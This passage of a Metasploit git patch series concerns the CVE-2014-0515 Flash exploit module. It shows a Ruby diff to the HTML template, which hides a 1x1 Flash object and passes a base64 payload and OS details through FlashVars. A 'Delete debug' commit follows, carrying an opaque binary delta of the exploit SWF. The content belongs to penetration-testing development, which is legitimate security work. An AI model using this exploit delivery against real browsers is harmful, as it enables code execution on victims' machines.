+    os_name = target_info[:os_name]
+    platform_id = 'win'
 
     html_template = %Q|<html>
     <body>
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=flash_payload%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
     </object>
     </body>
     </html>
@@ -120,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def create_swf
-    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" )
+    path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0515', 'msf.swf' )
     swf =  ::File.open(path, 'rb') { |f| swf = f.read }
 
     swf

From 72672fc8f76c741b261d808bfd0826b9f6468959 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 11 Jun 2015 17:39:36 -0500
Subject: [PATCH 0397/1013] Delete debug

---
 data/exploits/CVE-2014-0515/msf.swf           | Bin 21561 -> 21426 bytes
 .../source/exploits/CVE-2014-0515/Exploit.as  |  33 +++++++-----------
 .../source/exploits/CVE-2014-0515/Logger.as   |   2 +-
 3 files changed, 13 insertions(+), 22 deletions(-)

diff --git a/data/exploits/CVE-2014-0515/msf.swf b/data/exploits/CVE-2014-0515/msf.swf
index 06505fbe4baf63c80bb00ff2d8675c02f1111274..f3365d8d43d889270dca80abe8672e4eecf41414 100644
GIT binary patch
delta 21312
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
